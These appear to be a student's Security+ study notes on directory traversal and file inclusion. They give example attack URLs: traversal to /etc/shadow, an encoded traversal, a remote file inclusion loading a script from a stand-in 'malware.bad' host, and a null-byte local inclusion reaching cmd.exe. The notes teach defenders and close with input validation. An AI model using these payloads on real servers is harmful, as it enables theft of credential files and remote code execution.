Directory Traversal Attack
(OBJ 2.4)
Directory Traversal Attack
-
An injection attack occurs when the attacker inserts malicious code through an application interface
- A Directory Traversal is a type of injection attack
-
Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory
http://diontraining.com/../../../../etc/shadow- Unix systems use
../ - Windows systems use
..\by default but may also accept the Unix-like../ - In this example the
../is doing the Directory Traversal
-
Directory traversals may be used to access any file on a system with the right permissions
- If the server is configured correctly attackers are not going to have access as a web user to read my shadow/passwd file.
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250714161013.png)
../goes into the folder below it and so on until reaching the desired directory
WARNING
- Attackers may use encoding to hide directory traversal attempts (
%2e%2e%2frepresents../)
File Inclusion
- Web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor
- Remote File Inclusion
- An attacker executes a script to inject a remote file into the web app or website
https://diontraining.com/login.php?user=http://malware.bad/malicious.php- We're passing this parameter and when our system executes and tries to find that parameter to load it into our database, instead, we're going to load in this malicious script.
- We're including this remote file, malicious/php from this other website into my web server using this type of command.
- An attacker executes a script to inject a remote file into the web app or website
- Local File Inclusion
- An attacker adds a file to the web app or website that already exists on the hosting server
https://diontraining.com/login.php?user= ../../Windows/system32/cmd.exe%00- They're trying to go up to directories, into the Windows directory, down into System32, and run the command shell.
- This way they can run any program they want that executes in DOS or Widows
- That
%00at the end is a common tactic used to insert a null character at the end of your URL.%00in URL encoding is essentially a null character.- This is being used to request to bypass the security mechanisms, that would normally add a
.phpto the end of the request and instead allow us to use that.exeextension.
- This is being used to request to bypass the security mechanisms, that would normally add a
- An attacker adds a file to the web app or website that already exists on the hosting server
- Logs containing
../pertain to directory traversals
Prevention
- To prevent directory traversals and file inclusion attacks, use proper input validation